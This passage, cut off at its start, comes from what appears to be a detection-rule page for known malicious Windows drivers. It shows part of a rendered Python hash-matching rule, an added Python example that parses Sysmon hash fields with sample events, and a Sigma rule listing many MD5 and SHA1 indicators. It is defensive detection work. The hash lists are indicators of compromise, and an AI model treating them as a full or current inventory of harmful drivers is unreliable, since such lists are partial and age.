            "IMPHASH=d51f0f6034eb5e45f0ed4e9b7bbc9c97" in event.deep_get("Hashes", default=""),
            "IMPHASH=0ad7da35304c75ccf859bc29fe9ed09e" in event.deep_get("Hashes", default=""),
            "IMPHASH=bf9d32a6ab9effcd2fd6a734e5be98f9" in event.deep_get("Hashes", default=""),
            "IMPHASH=87fd2b54ed568e2294300e164b8c46f7" in event.deep_get("Hashes", default=""),
            "IMPHASH=2de3451f3e7b02970582bb8f9fd8c73a" in event.deep_get("Hashes", default=""),
            "IMPHASH=e97dc162f416bf06745bf9ffdf78a0ff" in event.deep_get("Hashes", default=""),
            "IMPHASH=2a008187d4a73284ddcc43f1b727b513" in event.deep_get("Hashes", default=""),
            "IMPHASH=f8e4844312e81dbdb4e8e95e2ad2c127" in event.deep_get("Hashes", default=""),
            "IMPHASH=4c7cc13a110ccdbb932bb9d7d42efdf4" in event.deep_get("Hashes", default=""),
            "IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4" in event.deep_get("Hashes", default=""),
            "IMPHASH=3db9de43d5d530c10d0cd2d43c7a0771" in event.deep_get("Hashes", default=""),
        ]
    ):
        return True
    return False
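A practitioner's caveat on the rendered query above: every element is a Python `in` test, which is case-sensitive, against a lower-case literal. The Sigma `contains` modifier is case-insensitive, and Sysmon writes the hex in its `Hashes` field in upper case, so the rendering as shown only matches sensors that happen to emit lower-case hex. The following is an added example (not the rendered rule, and not Panther's or SigmaHQ's code) that parses the `Hashes` field once, normalises case, and does exact set lookups per algorithm instead of several hundred substring scans. It assumes Sysmon Event ID 6 field names (`Hashes`, `ImageLoaded`), takes a handful of indicators from the rule above, and the sample events, file names and all-zero hash values are constructed; `rule()`/`title()` follow Panther's function naming but nothing else here is Panther-specific.

```python
"""Added example: hash-based malicious driver load check with exact, case-insensitive
matching. Not the rendered rule above and not Panther's or SigmaHQ's code."""
from typing import Dict, Optional, Tuple

# Indicators copied from the rule above (a subset, enough to show the mechanics).
# Stored lower-case so the comparison does not depend on how the sensor capitalises hex.
KNOWN_BAD: Dict[str, frozenset] = {
    "sha256": frozenset({
        "aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9",
        "087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212",
    }),
    "md5": frozenset({
        "5be61a24f50eb4c94d98b8a82ef58dcf",
        "d70a80fc73dd43469934a7b1cc623c76",
    }),
    "imphash": frozenset({
        "8d070a93a45ed8ba6dba6bfbe0d084e7",
        "7641a0c227f0a3a45b80bb8af43cd152",
    }),
}
HEX_LENGTH = {"sha256": 64, "md5": 32, "imphash": 32}


def parse_hashes(field: str) -> Dict[str, str]:
    """Split a Sysmon-style Hashes value ("SHA256=..,MD5=..,IMPHASH=..") into
    {algorithm: lower-case hex}. Entries without '=', with the wrong length, or with
    non-hex content are dropped so a malformed field cannot accidentally match."""
    parsed: Dict[str, str] = {}
    for part in field.split(","):
        algo, sep, value = part.partition("=")
        algo, value = algo.strip().lower(), value.strip().lower()
        if not sep or HEX_LENGTH.get(algo) != len(value):
            continue
        try:
            int(value, 16)
        except ValueError:
            continue
        parsed[algo] = value
    return parsed


def matched_indicator(event: dict) -> Optional[str]:
    """Return 'ALGO=hex' for the first known-bad hash present in the event, else None."""
    hashes = parse_hashes(event.get("Hashes", ""))
    for algo, bad in KNOWN_BAD.items():
        value = hashes.get(algo)
        if value is not None and value in bad:
            return f"{algo.upper()}={value}"
    return None


def rule(event: dict) -> bool:
    """Panther-style entry point: True when the loaded driver's hash is known-bad."""
    return matched_indicator(event) is not None


def title(event: dict) -> str:
    """Panther-style alert title naming the driver path and the indicator that hit."""
    return (f"Malicious driver load: {event.get('ImageLoaded', '<unknown>')} "
            f"[{matched_indicator(event)}]")


def substring_rule(event: dict) -> bool:
    """The rendered rule's approach, kept for comparison: a case-sensitive substring
    test against lower-case literals. It misses the upper-case hex Sysmon emits."""
    hashes = event.get("Hashes", "")
    return any(f"{algo.upper()}={h}" in hashes
               for algo, bad in KNOWN_BAD.items() for h in bad)


# Constructed sample events in the shape of a parsed Sysmon Event ID 6 (DriverLoad).
# Paths and the all-zero hash values are placeholders, not real drivers.
SAMPLE_EVENTS = [
    {   # upper-case hex as Sysmon writes it; the SHA256 is an indicator from the rule
        "ImageLoaded": "C:\\Windows\\Temp\\loader.sys",
        "Hashes": "SHA256=AAFA642CA3D906138150059EEDDB6F6B4FE9AD90C6174386CFE13A13E8BE47D9,"
                  "IMPHASH=" + "0" * 32,
    },
    {   # benign driver, placeholder hashes
        "ImageLoaded": "C:\\Windows\\System32\\drivers\\benign.sys",
        "Hashes": "SHA256=" + "0" * 64 + ",MD5=" + "0" * 32,
    },
    {   # lower-case, only an IMPHASH present, and it is in the rule's list
        "ImageLoaded": "C:\\Windows\\Temp\\packed.sys",
        "Hashes": "IMPHASH=8d070a93a45ed8ba6dba6bfbe0d084e7",
    },
    {   # malformed field: a truncated hash and a bare algorithm name must not match
        "ImageLoaded": "C:\\Windows\\Temp\\odd.sys",
        "Hashes": "SHA256=aafa642c,MD5",
    },
]


def evaluate(events=SAMPLE_EVENTS) -> Dict[str, Tuple[bool, bool]]:
    """Run both checks over the samples: {ImageLoaded: (parsed match, substring match)}."""
    return {e["ImageLoaded"]: (rule(e), substring_rule(e)) for e in events}


if __name__ == "__main__":
    for path, (parsed_hit, substring_hit) in evaluate().items():
        print(f"{path}: parsed={parsed_hit} substring={substring_hit}")
```

The first sample is the case that matters: the parsed check fires on the upper-case Sysmon field while the substring check stays silent. Validating the hex length at parse time also protects a long indicator list from a stray short or truncated entry matching more than it should.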
view Sigma YAML
title: Malicious Driver Load
id: 05296024-fe8a-4baf-8f3d-9a5f5624ceb2
status: test
description: Detects loading of known malicious drivers via their hash.
references:
    - https://loldrivers.io/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-18
modified: 2023-12-02
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
    - attack.t1068
logsource:
    product: windows
    category: driver_load
detection:
    selection:
        Hashes|contains:
            - 'MD5=5be61a24f50eb4c94d98b8a82ef58dcf'
            - 'MD5=d70a80fc73dd43469934a7b1cc623c76'
            - 'MD5=3b71eab204a5f7ed77811e41fed73105'
            - 'MD5=528ce5ce19eb34f401ef024de7ddf222'
            - 'MD5=ae548418b491cd3f31618eb9e5730973'
            - 'MD5=72f53f55898548767e0276c472be41e8'
            - 'MD5=508faa4647f305a97ed7167abc4d1330'
            - 'MD5=ed2b653d55c03f0bffa250372d682b75'
            - 'MD5=0d2ba47286f1c68e87622b3a16bf9d92'
            - 'MD5=3164bd6c12dd0fe1bdf3b833d56323b9'
            - 'MD5=70fd7209ce5c013a1f9e699b5cc86cdc'
            - 'MD5=c71be7b112059d2dc84c0f952e04e6cc'
            - 'MD5=acac842a46f3501fe407b1db1b247a0b'
            - 'MD5=01c2e4d8234258451083d6ce4e8910b7'
            - 'MD5=c8541a9cef64589593e999968a0385b9'
            - 'MD5=e172a38ade3aa0a2bc1bf9604a54a3b5'
            - 'MD5=6fcf56f6ca3210ec397e55f727353c4a'
            - 'MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16'
            - 'MD5=07056573d464b0f5284f7e3acedd4a3f'
            - 'MD5=c7b7f1edb9bbef174e6506885561d85d'
            - 'MD5=d5918d735a23f746f0e83f724c4f26e5'
            - 'MD5=84763d8ca9fe5c3bff9667b2adf667de'
            - 'MD5=fb593b1f1f80d20fc7f4b818065c64b6'
            - 'MD5=909f3fc221acbe999483c87d9ead024a'
            - 'MD5=e29f6311ae87542b3d693c1f38e4e3ad'
            - 'MD5=aeb0801f22d71c7494e884d914446751'
            - 'MD5=3f11a94f1ac5efdd19767c6976da9ba4'
            - 'MD5=be6318413160e589080df02bb3ca6e6a'
            - 'MD5=0b311af53d2f4f77d30f1aed709db257'
            - 'MD5=d075d56dfce6b9b13484152b1ef40f93'
            - 'MD5=27384ec4c634701012a2962c30badad2'
            - 'MD5=5eb2c576597dd21a6b44557c237cf896'
            - 'MD5=f56db4eba3829c0918413b5c0b42f00f'
            - 'MD5=e27b2486aa5c256b662812b465b6036c'
            - 'MD5=db86dfd7aefbb5be6728a63461b0f5f3'
            - 'MD5=04a88f5974caa621cee18f34300fc08a'
            - 'MD5=5129d8fd53d6a4aba81657ab2aa5d243'
            - 'MD5=cd2c641788d5d125c316ed739c69bb59'
            - 'MD5=7073cd0085fcba1cd7d3568f9e6d652c'
            - 'MD5=24f0f2b4b3cdae11de1b81c537df41c7'
            - 'MD5=88bea56ae9257b40063785cf47546024'
            - 'MD5=63060b756377fce2ce4ab9d079ca732f'
            - 'MD5=50b39072d0ee9af5ef4824eca34be6e3'
            - 'MD5=57c18a8f5d1ba6d015e4d5bc698e3624'
            - 'MD5=7d26985a5048bad57d9c223362f3d55c'
            - 'MD5=ba54a0dbe2685e66e21d41b4529b3528'
            - 'MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11'
            - 'MD5=b52f51bbe6b49d0b475d943c29c4d4cb'
            - 'MD5=a837302307dace2a00d07202b661bce2'
            - 'MD5=78a122d926ccc371d60c861600c310f3'
            - 'MD5=bdb305aa0806f8b38b7ce43c927fe919'
            - 'MD5=27053e964667318e1b370150cbca9138'
            - 'MD5=6a4fbcfb44717eae2145c761c1c99b6a'
            - 'MD5=d13c1b76b4a1ca3ff5ab63678b51df6d'
            - 'MD5=6a066d2be83cf83f343d0550b0b8f206'
            - 'MD5=7108b0d4021af4c41de2c223319cd4c1'
            - 'MD5=1cd158a64f3d886357535382a6fdad75'
            - 'MD5=e939448b28a4edc81f1f974cebf6e7d2'
            - 'MD5=4198d3db44d7c4b3ba9072d258a4fc2d'
            - 'MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20'
            - 'MD5=30ca3cc19f001a8f12c619daa8c6b6e3'
            - 'MD5=fe9004353b25640f6a879e57f07122d7'
            - 'MD5=06c7fcf3523235cf52b3eee083ec07b2'
            - 'MD5=364605ad21b9275681cffef607fac273'
            - 'MD5=968ddb06af90ef83c5f20fbdd4eee62e'
            - 'MD5=ba50bd645d7c81416bb26a9d39998296'
            - 'MD5=29e03f4811b64969e48a99300978f58c'
            - 'MD5=b0770094c3c64250167b55e4db850c04'
            - 'MD5=40b968ecdbe9e967d92c5da51c390eee'
            - 'MD5=b6b530dd25c5eb66499968ec82e8791e'
            - 'MD5=f209cb0e468ca0b76d879859d5c8c54e'
            - 'MD5=76f8607fc4fb9e828d613a7214436b66'
            - 'MD5=4b058945c9f2b8d8ebc485add1101ba5'
            - 'MD5=faae7f5f69fde12303dd1c0c816b72b7'
            - 'MD5=89d294ef7fefcdf1a6ca0ab96a856f57'
            - 'MD5=ef0e1725aaf0c6c972593f860531a2ea'
            - 'MD5=bbdbffebfc753b11897de2da7c9912a5'
            - 'MD5=5ebfc0af031130ba9de1d5d3275734b3'
            - 'MD5=22949977ce5cd96ba674b403a9c81285'
            - 'MD5=77cfd3943cc34d9f5279c330cd8940bc'
            - 'MD5=311de109df18e485d4a626b5dbe19bc6'
            - 'MD5=2730cc25ad385acc7213a1261b21c12d'
            - 'MD5=87dc81ebe85f20c1a7970e495a778e60'
            - 'MD5=154b45f072fe844676e6970612fd39c7'
            - 'MD5=5a4fe297c7d42539303137b6d75b150d'
            - 'MD5=d6a1dd7b2c06f058b408b3613c13d413'
            - 'MD5=a6e9d6505f6d2326a8a9214667c61c67'
            - 'MD5=7fad9f2ef803496f482ce4728578a57a'
            - 'MD5=5076fba3d90e346fd17f78db0a4aa12c'
            - 'MD5=79df0eabbf2895e4e2dae15a4772868c'
            - 'MD5=14580bd59c55185115fd3abe73b016a2'
            - 'MD5=1f2888e57fdd6aee466962c25ba7d62d'
            - 'MD5=5e9231e85cecfc6141e3644fda12a734'
            - 'MD5=dc564bac7258e16627b9de0ce39fae25'
            - 'MD5=4e4c068c06331130334f23957fca9e3c'
            - 'MD5=1ee9f6326649cd23381eb9d7dfdeddf7'
            - 'MD5=4e1f656001af3677856f664e96282a6f'
            - 'MD5=36f44643178c505ea0384e0fb241e904'
            - 'MD5=6b480fac7caca2f85be9a0cfe79aedfc'
            - 'MD5=c1ab425977d467b64f437a6c5ad82b44'
            - 'MD5=fe508caa54ffeb2285d9f00df547fe4a'
            - 'MD5=d3af70287de8757cebc6f8d45bb21a20'
            - 'MD5=990b949894b7dc82a8cf1131b063cb1a'
            - 'MD5=c62209b8a5daf3f32ad876ad6cefda1b'
            - 'MD5=c159fb0f345a8771e56aab8e16927361'
            - 'MD5=19b15eeccab0752c6793f782ca665a45'
            - 'MD5=1d51029dfbd616bf121b40a0d1efeb10'
            - 'MD5=157a22689629ec876337f5f9409918d5'
            - 'MD5=3dd829fb27353622eff34be1eabb8f18'
            - 'MD5=8636fe3724f2bcba9399daffd6ef3c7e'
            - 'MD5=3d0b3e19262099ade884b75ba86ca7e8'
            - 'MD5=97539c78d6e2b5356ce79e40bcd4d570'
            - 'MD5=0308b6888e0f197db6704ca20203eee4'
            - 'MD5=091a6bd4880048514c5dd3bede15eba5'
            - 'MD5=7e92f98b809430622b04e88441b2eb04'
            - 'MD5=bb5bda8889d8d27ef984dbd6ad82c946'
            - 'MD5=b76aee508f68b5b6dccd6e1f66f4cf8b'
            - 'MD5=a822b9e6eedf69211013e192967bf523'
            - 'MD5=df52f8a85eb64bc69039243d9680d8e4'
            - 'MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a'
            - 'MD5=44857ca402a15ab51dc5afe47abdfa44'
            - 'MD5=f9844524fb0009e5b784c21c7bad4220'
            - 'MD5=d34b218c386bfe8b1f9c941e374418d7'
            - 'MD5=0ca010a32a9b0aeae1e46d666b83b659'
            - 'MD5=93496a436c5546156a69deb255a9fed0'
            - 'MD5=1cd5e231064e03c596e819b6ff48daf9'
            - 'MD5=70a71fe86df717ac59dbf856d7ac5789'
            - 'MD5=a33089d4e50f7d2ea8b52ca95d26ebf3'
            - 'MD5=e0cc9b415d884f85c45be145872892b8'
            - 'MD5=a42249a046182aaaf3a7a7db98bfa69d'
            - 'MD5=c5ae6ca044bd03c3506c132b033be1dc'
            - 'MD5=7ebe606acd81abf1f8cb0767c974164b'
            - 'MD5=b5dcc869a91efcc6e8ea0c3c07605d63'
            - 'MD5=62c18d61ed324088f963510bae43b831'
            - 'MD5=093a2a635c3a27aac50efd6463f4efa1'
            - 'MD5=28102acca39ad0199f262ba9958be3f4'
            - 'MD5=650ef9dd70cb192027e536754d6e0f63'
            - 'MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44'
            - 'MD5=6771b13a53b9c7449d4891e427735ea2'
            - 'MD5=072ba2309b825ce1dba37d8d924ea8ed'
            - 'MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb'
            - 'MD5=1325ec39e98225e487b40043faee8052'
            - 'MD5=4484f4007de2c3ee4581a2cff77ca3b4'
            - 'MD5=a236e7d654cd932b7d11cb604629a2d0'
            - 'MD5=17509f0a98dc5c5d52c3f9ac1428a21b'
            - 'MD5=840a5edf2534dd23a082cf7b28cbfc4d'
            - 'MD5=77a7ed4798d02ef6636cd0fd07fc382a'
            - 'MD5=a9df5964635ef8bd567ae487c3d214c4'
            - 'MD5=8b75047199825c8e62fdcc1c915db8bd'
            - 'MD5=d416494232c4197cb36a914df2e17677'
            - 'MD5=4cf14a96485a1270fed97bb8000e4f86'
            - 'MD5=35e512f9bedc89dca5ce81f35820714c'
            - 'MD5=40f35792e7565aa047796758a3ce1b77'
            - 'MD5=f7f31bccc9b7b2964ac85106831022b1'
            - 'MD5=26aedc10d4215ba997495d3a68355f4a'
            - 'MD5=10f3679384a03cb487bda9621ceb5f90'
            - 'MD5=80219fb6b5954c33e16bac5ecdac651b'
            - 'MD5=cee36b5c6362993fa921435979bfbe4a'
            - 'MD5=e37a08f516b8a7ca64163f5d9e68fe5a'
            - 'MD5=49518f7375a5f995ebe9423d8f19cfe4'
            - 'MD5=920df6e42cf91bbe19707f5a86e3c5c5'
            - 'MD5=2ec877e425bd7eddb663627216e3491e'
            - 'MD5=550b7991d93534bc510bc4f237155a7a'
            - 'MD5=98d53f6b3bec0a3417a04fbb9e17fa06'
            - 'MD5=13a57a4ef721440c7c9208b51f7c05de'
            - 'MD5=c5fc3605194e033bdf3781ff2adaeb61'
            - 'MD5=6e625ec04c20a9dbd48c7060efbf5e92'
            - 'MD5=0b9b78d1281c7d4ab50497cf6ea7452a'
            - 'MD5=4e906fcb13e2793c98f47291fd69391b'
            - 'MD5=2bb353891d65c9e267eb98a3a2b694c3'
            - 'MD5=7d86cdda7f49f91fdb69901a002b34e7'
            - 'MD5=f69b06ca7c34d16f26ea1c6861edf62a'
            - 'MD5=ee6b1a79cb6641aa44c762ee90786fe0'
            - 'MD5=1fc7aeeff3ab19004d2e53eae8160ab1'
            - 'MD5=24d3ea54f25e32832ac20335a1ce1062'
            - 'MD5=c94f405c5929cfcccc8ad00b42c95083'
            - 'MD5=b164daf106566f444dfb280d743bc2f7'
            - 'MD5=93130909e562925597110a617f05e2a9'
            - 'MD5=f589d4bf547c140b6ec8a511ea47c658'
            - 'MD5=bf445ac375977ecf551bc2a912c58e8a'
            - 'MD5=629ee55e4b5a225d048fbcd5f0a1d18b'
            - 'MD5=0023ca0ca16a62d93ef51f3df98b2f94'
            - 'MD5=a3d69c7e24300389b56782aa63b0e357'
            - 'MD5=cbd8d370462503508e44dba023bdf9bc'
            - 'MD5=67daa04716803a15fc11c9e353d77c2f'
            - 'MD5=c9d4214c850e0cedf033dc8f0cd3aace'
            - 'MD5=bd5b0514f3b40f139d8079138d01b5f6'
            - 'MD5=19bdd9b799e3c2c54c0d7fff68b31c20'
            - 'MD5=f242cffd9926c0ccf94af3bf16b6e527'
            - 'MD5=5aeab9427d85951def146b4c0a44fc63'
            - 'MD5=40170485cca576adb5266cf5b0d3b0bd'
            - 'MD5=c277c4386a78fae1b7e17eaecf4f472b'
            - 'MD5=58c37866cbc3d1338e4fc58ada924ffe'
            - 'MD5=0f16a43f7989034641fd2de3eb268bf1'
            - 'MD5=0ae30291c6cbfa7be39320badd6e8de0'
            - 'MD5=05dd59bd4f175304480affd8f1305c37'
            - 'MD5=f838f4eb36f1e7036238776c7a70f0b0'
            - 'MD5=85093bb9f027027c2c61aee50796de30'
            - 'MD5=ae338d91d1b05a72559b7f6ed717362d'
            - 'MD5=bd91787b5dcb2189b856804e85dfa1d9'
            - 'MD5=6b3c1511e12f4d27a4ea3b18020d7b84'
            - 'MD5=97264fd62d4907bdac917917a07b3b7a'
            - 'MD5=6ececf26ff8b03ed7ffbddadec9a9dab'
            - 'MD5=47e6ac52431ca47da17248d80bf71389'
            - 'MD5=eb57f03b7603f0b235af62e8cd5be8c2'
            - 'MD5=e1a9aa4c14669b1fb1f67a7266f87e82'
            - 'MD5=29047f0b7790e524b09a06852d31a117'
            - 'MD5=4dd6250eb2d368f500949952eb013964'
            - 'MD5=fb7c61ef427f9b2fdff3574ee6b1819b'
            - 'MD5=844af8c877f5da723c1b82cf6e213fc1'
            - 'MD5=e39152eadd76751b1d7485231b280948'
            - 'MD5=ac6e29f535b2c42999c50d2fc32f2c9c'
            - 'MD5=2406ea37152d2154be3fef6d69ada2c6'
            - 'MD5=0ea8389589c603a8b05146bd06020597'
            - 'MD5=754e21482baf18b8b0ed0f4be462ba03'
            - 'MD5=c4a517a02ba9f6eac5cf06e3629cc076'
            - 'MD5=32282e07db321e8d7849f2287bb6a14f'
            - 'MD5=32b67a6cd6dd998b9f563ed13d54a8bc'
            - 'MD5=3359e1d4244a7d724949c63e89689ef8'
            - 'MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0'
            - 'MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6'
            - 'MD5=a90236e4962620949b720f647a91f101'
            - 'MD5=ccde8c94439f9fc9c42761e4b9a23d97'
            - 'MD5=68caf620ef8deaf06819cf8c80d3367b'
            - 'MD5=5fec28e8f4f76e5ede24beb32a32b9d7'
            - 'MD5=e8eac6642b882a6196555539149c73f2'
            - 'MD5=aa98b95f5cbae8260122de06a215ee10'
            - 'MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80'
            - 'MD5=abc168fdca7169bf9dc40cec9761018d'
            - 'MD5=7f9309f5e4defec132b622fadbcad511'
            - 'MD5=4748696211bd56c2d93c21cab91e82a5'
            - 'MD5=48394dce30bb8da5ae089cb8f41b86dc'
            - 'MD5=65f800e1112864bf41eb815649f428d5'
            - 'MD5=bd25be845c151370ff177509d95d5add'
            - 'MD5=a37ed7663073319d02f2513575a22995'
            - 'MD5=2c39f6172fbc967844cac12d7ab2fa55'
            - 'MD5=491aec2249ad8e2020f9f9b559ab68a8'
            - 'MD5=1e0eb80347e723fa31fce2abb0301d44'
            - 'MD5=a26363e7b02b13f2b8d697abb90cd5c3'
            - 'MD5=4118b86e490aed091b1a219dba45f332'
            - 'MD5=6d131a7462e568213b44ef69156f10a5'
            - 'MD5=10c2ea775c9e76e7774ab89e38f38287'
            - 'SHA1=994e3f5dd082f5d82f9cc84108a60d359910ba79'
            - 'SHA1=4f7989ad92b8c47c004d3731b7602ce0934d7a23'
            - 'SHA1=f2fe02e28cf418d935ec63168caf4dff6a9fbdfe'
            - 'SHA1=af42afda54d150810a60baa7987f9f09d49d1317'
            - 'SHA1=09375f13521fc0cacf2cf0a28b2a9248f71498d7'
            - 'SHA1=c75e8fceed74a4024d38ca7002d42e1ecf982462'
            - 'SHA1=03e82eae4d8b155e22ffdafe7ba0c4ab74e8c1a7'
            - 'SHA1=e730eb971ecb493b69de2308b6412836303f733a'
            - 'SHA1=6a95860594cd8b7e3636bafa8f812e05359a64ca'
            - 'SHA1=5fef884a901e81ac173d63ade3f5c51694decf74'
            - 'SHA1=a8ddb7565b61bc021cd2543a137e00627f999dcc'
            - 'SHA1=6451522b1fb428e549976d0742df5034f8124b17'
            - 'SHA1=8ad0919629731b9a8062f7d3d4a727b28f22e81a'
            - 'SHA1=cc65bf60600b64feece5575f21ab89e03a728332'
            - 'SHA1=bbc8bd714c917bb1033f37e4808b4b002cd04166'
            - 'SHA1=4f2d9a70ea24121ae01df8a76ffba1f9cc0fde4a'
            - 'SHA1=f6a18fc9c4abe4a82c1ab28abc0a7259df8de7a3'
            - 'SHA1=c42178977bd7bbefe084da0129ed808cb7266204'
            - 'SHA1=766949d4599fbf8f45e888c9d6fedf21e04fb333'
            - 'SHA1=b7ff8536553cb236ea2607941e634b23aadb59ee'
            - 'SHA1=76789196eebfd4203f477a5a6c75eefc12d9a837'
            - 'SHA1=e5566684a9e0c1afadae80c3a8be6636f6cad7cf'
            - 'SHA1=7638c048af5beae44352764390deea597cc3e7b1'
            - 'SHA1=6a6fe0d69e0ea34d695c3b525e6db639f9ad6ac5'
            - 'SHA1=08dd35dde6187af579a1210e00eadbcea29e66d2'
            - 'SHA1=9ee31f1f25f675a12b7bad386244a9fbfa786a87'
            - 'SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e'
            - 'SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d'
            - 'SHA1=505546d82aab56889a923004654b9afdec54efe6'
            - 'SHA1=0fe2d22bd2e6b7874f4f2b6279e2ca05edd1222a'
            - 'SHA1=8aa0e832e5ca2eb79dafabadbe9948a191008383'
            - 'SHA1=844d7bcd1a928d340255ff42971cca6244a459bf'
            - 'SHA1=9e2ebc489c50b6bbae3b08473e007baa65ff208f'
            - 'SHA1=7e836dadc2e149a0b758c7e22c989cbfcce18684'
            - 'SHA1=2480549ec8564cd37519a419ab2380cf3e8bab9e'
            - 'SHA1=8b9dd4c001f17e7835fdaf0d87a2f3e026557e84'
            - 'SHA1=d3f6c3ea2ef7124403c0fb6e7e3a0558729b5285'
            - 'SHA1=40df7a55c200371853cc3fd3cc03b5ac932f5cd6'
            - 'SHA1=607387cc90b93d58d6c9a432340261fde846b1d9'
            - 'SHA1=2779c54ccd1c008cd80e88c2b454d76f4fa18c07'
            - 'SHA1=46c9a474a1a62c25a05bc7661b75a80b471616e6'
            - 'SHA1=a2fe7de67b3f7d4b1def88ce4ba080f473c0fbc6'
            - 'SHA1=b8b123a413b7bccfa8433deba4f88669c969b543'
            - 'SHA1=bf2f8ada4e80aed4710993cedf4c5d32c95cd509'
            - 'SHA1=e3a1e7ce9e9452966885371e4c7fb48a2efdef22'
            - 'SHA1=c7f0423ac5569f13d2b195e02741ad7eed839c6d'
            - 'SHA1=a111dc6ae5575977feba71ee69b790e056846a02'
            - 'SHA1=ac4ace1c21c5cb72c6edf6f2f0cc3513d7c942c3'
            - 'SHA1=d4304bc75c2cb9917bb10a1dc630b75af194f7b2'
            - 'SHA1=0de86ec7d7f16a3680df89256548301eed970393'
            - 'SHA1=b2fb5036b29b12bcec04c3152b65b67ca14d61f2'
            - 'SHA1=0883a9c54e8442a551994989db6fc694f1086d41'
            - 'SHA1=01cf1fe3937fb6585ffb468b116a3af8ddf9ef16'
            - 'SHA1=98c4406fede34c3704afd8cf536ec20d93df9a10'
            - 'SHA1=1048f641adf3988d882a159bf1332eeb6d6a7f09'
            - 'SHA1=867652e062eb6bd1b9fc29e74dea3edd611ef40c'
            - 'SHA1=78fd06c82d3ba765c38bad8f48d1821a06280e39'
            - 'SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c'
            - 'SHA1=fdbcebb6cafda927d384d7be2e8063a4377d884f'
            - 'SHA1=994dc79255aeb662a672a1814280de73d405617a'
            - 'SHA1=6abc7979ba044f31884517827afb7b4bdaa0dcc1'
            - 'SHA1=1768f9c780fe7cf66928cfceaef8ed7d985e18f5'
            - 'SHA1=5fa527e679d25a15ecc913ce6a8d0218e2ff174b'
            - 'SHA1=f11188c540eada726766e0b0b2f9dd3ae2679c61'
            - 'SHA1=8416ee8fd88c3d069fbba90e959507c69a0ee3e9'
            - 'SHA1=ab4399647ebd16c02728c702534a30eb0b7ccbe7'
            - 'SHA1=98588b1d1b63747fa6ee406983bf50ad48a2208b'
            - 'SHA1=86e6669dbbce8228e94b2a9f86efdf528f0714fd'
            - 'SHA1=c9e9198d52d94771cb14711a5f6aaf8d82b602a2'
            - 'SHA1=17fa047c1f979b180644906fe9265f21af5b0509'
            - 'SHA1=1b526cbcba09b8d663e82004cf24ef44343030d3'
            - 'SHA1=4e0f5576804dab14abb29a29edb9616a1dbe280a'
            - 'SHA1=eb76de59ebc5b2258cff0567577ff8c9d0042048'
            - 'SHA1=d4f5323da704ff2f25d6b97f38763c147f2a0e6f'
            - 'SHA1=6802e2d2d4e6ee38aa513dafd6840e864310513b'
            - 'SHA1=ac18c7847c32957abe8155bcbe71c1f35753b527'
            - 'SHA1=beed6fb6a96996e9b016fa7f2cf7702a49c8f130'
            - 'SHA1=7d453dccb25bf36c411c92e2744c24f9b801225d'
            - 'SHA1=9648ad90ec683c63cc02a99111a002f9b00478d1'
            - 'SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a'
            - 'SHA1=31fac347aa26e92db4d8c9e1ba37a7c7a2234f08'
            - 'SHA1=fde0fff1c3e4c053148748504d4b9e0cc97f37ec'
            - 'SHA1=73bac306292b4e9107147db94d0d836fdb071e33'
            - 'SHA1=9382981b05b1fb950245313992444bfa0db5f881'
            - 'SHA1=acb8e45ebd1252313ece94198df47edf9294e7d3'
            - 'SHA1=9c36600c2640007d3410dea8017573a113374873'
            - 'SHA1=53f776d9a183c42b93960b270dddeafba74eb3fb'
            - 'SHA1=1fdb2474908bdd2ee1e9bd3f224626f9361caab7'
            - 'SHA1=3533d0a54c7ccd83afd6be24f6582b30e4ca0aab'
            - 'SHA1=cb25a5125fb353496b59b910263209f273f3552d'
            - 'SHA1=a5f1b56615bdaabf803219613f43671233f2001c'
            - 'SHA1=6c7663de88a0fba1f63a984f926c6ef449059e38'
            - 'SHA1=e514dfadbeb4d2305988c3281bf105d252dee3a7'
            - 'SHA1=632c80a3c95cf589b03812539dea59594eaefae0'
            - 'SHA1=e6966e360038be3b9d8c9b2582eba4e263796084'
            - 'SHA1=675cc00de7c1ef508ccd0c91770c82342c0ad4ab'
            - 'SHA1=6ae26bde7ec27bd0fa971de6c7500eee34ee9b51'
            - 'SHA1=80e4808a7fe752cac444676dbbee174367fa2083'
            - 'SHA1=77b4f0c0b06e3dc2474d5e250b772dacaac14dd0'
            - 'SHA1=7277d965b9de91b4d8ea5eb8ae7fa3899eef63a2'
            - 'SHA1=3825ebb0b0664b5f0789371240f65231693be37d'
            - 'SHA1=de9469a5d01fb84afd41d176f363a66e410d46da'
            - 'SHA1=91568d7a82cc7677f6b13f11bea5c40cf12d281b'
            - 'SHA1=4b882748faf2c6c360884c6812dd5bcbce75ebff'
            - 'SHA1=599de57a5c05e27bb72c7b8a677e531d8e4bf8b5'
            - 'SHA1=1d373361d3129d11bc43f9b6dfa81d06e5ca8358'
            - 'SHA1=c5bd9f2b3a51ba0da08d7c84bab1f2d03a95e405'
            - 'SHA1=89165bbb761d6742ac2a6f5efbffc80c17990bd8'
            - 'SHA1=97812f334a077c40e8e642bb9872ac2c49ddb9a2'
            - 'SHA1=d417c0be261b0c6f44afdec3d5432100e420c3ed'
            - 'SHA1=37e6450c7cd6999d080da94b867ba23faa8c32fe'
            - 'SHA1=9481cd590c69544c197b4ee055056302978a7191'
            - 'SHA1=ff3e19cd461ddf67529a765cbec9cb81d84dc7da'
            - 'SHA1=6972314b6d6b0109b9d0a951eb06041f531f589b'
            - 'SHA1=dd94a2436994ac35db91e0ec9438b95e438d38c5'
            - 'SHA1=dcc852461895311b56e3ae774c8e90782a79c0b4'
            - 'SHA1=3489ed43bdd11ccbfc892baaeae8102ff7d22f25'
            - 'SHA1=e38e1efd98cd8a3cdb327d386db8df79ea08dccc'
